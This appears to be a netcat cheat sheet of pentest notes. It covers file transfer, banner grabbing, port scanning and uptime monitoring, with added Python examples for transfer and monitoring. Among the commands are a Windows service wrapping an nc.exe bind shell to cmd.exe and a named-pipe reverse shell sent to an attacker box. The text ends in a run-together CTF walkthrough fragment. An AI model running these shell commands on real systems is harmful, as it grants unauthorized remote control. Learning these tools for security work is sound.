
Netcat / nc: without -e support, scan using nc for which ports are listening

How to move files between two systems using nc. Works on both Linux and Windows. nc gives no end-of-file marker and no integrity check, so verify the copy with a checksum (md5sum / sha256sum) on both sides.


On the source/sending machine (the listener):
    # nc -lvp 2222 < sending_this_file.txt
On the target/receiving machine (target_ip_address is the address of the listening/sending machine):
    # nc -nv target_ip_address 2222 > receiving_this_file.txt


Building off of the previous example, we can accomplish more useful tasks.
Because we are establishing a regular TCP connection, we can transmit just about any kind of information over that connection. It is not limited to chat messages that are typed in by a user. We can use this knowledge to turn netcat into a file transfer program.
Once again, we need to choose one end of the connection to listen for connections. However, instead of printing information onto the screen, as we did in the last example, we will place all of the information straight into a file:
  • netcat -l 4444 > received_file
On the second computer, create a simple text file by typing:
  • echo "Hello, this is a file" > original_file
We can now use this file as an input for the netcat connection we will establish to the listening computer. The file will be transmitted just as if we had typed it interactively:
  • netcat domain.com 4444 < original_file
We can see on the computer that was awaiting a connection that we now have a new file called "received_file" with the contents of the file we typed on the other computer:
  • cat received_file

Output:
Hello, this is a file
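The same transfer written out in Python, as an added example that is not part of the original post: receive_file() is the listening side that writes until EOF, send_file() is the connecting side, and transfer_demo() runs both on loopback and returns a SHA-256 of each end so the copy can be checked, which nc itself never does. The payload and the temporary file names are constructed for the demo.

```python
import hashlib
import socket
import tempfile
import threading
from pathlib import Path

SAMPLE = b"Hello, this is a file\n"   # constructed stand-in for original_file

def receive_file(listener, dest):
    """Accept one connection and write everything it sends into dest until EOF
    (the sender closing its side), like 'netcat -l 4444 > received_file'."""
    conn, _ = listener.accept()
    digest = hashlib.sha256()
    with conn, open(dest, "wb") as out:
        while chunk := conn.recv(65536):
            out.write(chunk)
            digest.update(chunk)
    return digest.hexdigest()

def send_file(host, port, src):
    """Stream src over a bare TCP connection, like 'netcat host 4444 < file'.
    shutdown(SHUT_WR) is the EOF the receiver waits for; without it the
    listener blocks forever, as nc does while stdin stays open."""
    digest = hashlib.sha256()
    with socket.create_connection((host, port)) as sock, open(src, "rb") as f:
        while chunk := f.read(65536):
            sock.sendall(chunk)
            digest.update(chunk)
        sock.shutdown(socket.SHUT_WR)
    return digest.hexdigest()

def transfer_demo():
    """Run both sides on loopback; return both SHA-256 values and the received
    bytes so the caller can confirm the copy is intact (nc checks nothing)."""
    with tempfile.TemporaryDirectory() as tmp:
        src, dst = Path(tmp, "original_file"), Path(tmp, "received_file")
        src.write_bytes(SAMPLE)
        listener = socket.socket()
        listener.bind(("127.0.0.1", 0))          # loopback, ephemeral port
        listener.listen(1)
        port = listener.getsockname()[1]
        result = {}
        rx = threading.Thread(
            target=lambda: result.update(received=receive_file(listener, dst)))
        rx.start()
        result["sent"] = send_file("127.0.0.1", port, src)
        rx.join()
        listener.close()
        result["bytes"] = dst.read_bytes()
        return result
```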


=========================================================

# nc [targetIP] [remote_port]  => a netcat client connects to a target service and pulls back its banner / service info
(e.g. nc 1.2.3.4 21, nc 1.2.3.4 80; for port 80 you may have to enter HEAD / HTTP/1.0 followed by two Enters to get a response back from the IIS server.)

=========================================================

# echo "" | nc -v -n -w1 [target_ip] [port_range] ; echo "" sends an empty line and nothing else. If we do not pipe in this echo "", our netcat client will hang on the first open port, waiting forever for standard input from the keyboard, so we purposely echo nothing to close off standard input.
(e.g. echo "" | nc -v -n -w1 1.2.3.4 1-100) (<-- nc works through the range in reverse order, and this can be slow when run between VMware sessions)

=========================================================

# nc -v -l -p [local_port] (a netcat listener on port 80 receives and displays the connecting client's browser version, i.e. its request headers)

=========================================================

# while (true); do nc -vv -z -w3 [target_ip] [target_port] > /dev/null && echo -e "\x07"; sleep 1; done

<-- (monitors target_port once a second and beeps while it is reachable: -vv = very verbose; -z = send no data, just connect; -w3 = wait no more than 3 seconds for a connection to the target IP. As long as this netcat client can make a connection successfully (&&), we print the BEL character.)

=========================================================

# while `nc -vv -z -w3 [target_ip] [target_port] > /dev/null` ; do echo "Service is ok"; sleep 1; done; echo "Service is dead"; echo -e "\x07"

<-- ( ` is the backtick, the key next to the 1 key, pressed without shift. Bash runs the command substitution and, because it expands to no command word, uses nc's exit status as the loop test, so this prints a message every second while the service is ok and beeps once the service is dead.)
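The two monitoring loops above, as an added example in Python that is not from the original notes: probe() is the 'nc -z -w3' connect test with a hard timeout, and watch() is the loop, extended to declare an outage only after a number of consecutive failures instead of on the first one. demo_listener() is a constructed local service so the example runs self-contained; the host and port are placeholders, not a real target.

```python
import socket
import time

def probe(host, port, timeout=3.0):
    """TCP connect check with a hard timeout, the equivalent of
    'nc -vv -z -w3 host port': True only if the handshake completes."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:          # refused, timed out, unreachable, ...
        return False

def watch(host, port, checks, interval=1.0, timeout=3.0, fail_after=2):
    """Probe 'checks' times, 'interval' seconds apart, and return the list of
    (check_number, state) transitions. Unlike a beep on the first failed
    connect, an outage is declared only after 'fail_after' consecutive
    failures, so one dropped SYN is not reported as the service being dead."""
    events, failures, up = [], 0, None
    for i in range(checks):
        ok = probe(host, port, timeout)
        failures = 0 if ok else failures + 1
        if ok and up is not True:
            events.append((i, "up"))
            up = True
        elif failures >= fail_after and up is not False:
            events.append((i, "down"))
            up = False
        if i < checks - 1:
            time.sleep(interval)
    return events

def demo_listener():
    """Constructed stand-in for the monitored service: a socket listening on
    127.0.0.1 on an ephemeral port, so the example runs without a real target."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]

if __name__ == "__main__":
    srv, port = demo_listener()
    print("up" if probe("127.0.0.1", port) else "down")   # up: socket listens
    srv.close()
    print("up" if probe("127.0.0.1", port) else "down")   # down: nothing there
```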

=========================================================

windows>nc.exe -n -vv -w3 target_ip_address 1-100

netcat port scanning (in reverse order). -n tells netcat not to resolve names in DNS. -vv tells it to be very verbose, printing information on standard error when it can make a connection on a port, as well as a different message when it cannot. -w3 tells it to wait no more than 3 seconds on any port, moving on after a short pause if the port is open and giving up on closed ports after the timeout expires.

================
interact with a service

windows>sc \\hostname start service_name
windows>sc \\hostname delete service_name
windows>sc \\hostname query service_name

============
creating a service:

windows>sc \\%computername% create ncservice2 binpath= "c:\tools\nc.exe -l -p 2222 -e cmd.exe"

This will be killed after 30 seconds, since nc.exe never makes the API call back to the Service Control Manager saying that the service started successfully. Making it stick:

windows>sc \\%computername% create ncservice2 binpath= "cmd.exe /k c:\tools\nc.exe -l -p 2222 -e cmd.exe"

=============
# nc -z -vv -w 1 192.168.1.100 20-25
port scan using netcat/nc: identifying open ports on a target, here scanning ports 20 through 25

=============
without -e support (shell over nc using a named pipe):
skodo@pentestbox# nc -nvlp 443
victim$ mknod /tmp/backpipe p 
victim$ /bin/sh 0</tmp/backpipe | nc pentestbox 443 1>/tmp/backpipe
=============
scan using nc for which ports are listening (nc reports on standard error, hence the 2>&1 before grep)
- netcat -z -n -v 198.51.100.0 1-1000
- netcat -z -n -v 198.51.100.0 1-1000 2>&1 | grep open


Walkthru Notes 2nd approach  using nc via web using php reverse shell 3rd approach   w/o metasploit =================== walkthru: 1.  Updating OpenFuck Exploit(764) but it didnt work here @ https://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/ 2. ============== Notes: 80/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox virtual NIC) Running: FreeBSD 9.X|10.X OS CPE: cpe:/o:freebsd:freebsd:9 cpe:/o:freebsd:freebsd:10 OS details: FreeBSD 9.0-RELEASE - 10.3-RELEASE PORT     STATE SERVICE VERSION 8080/tcp open  http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) |_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 |_http-title: 403 Forbidden MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox...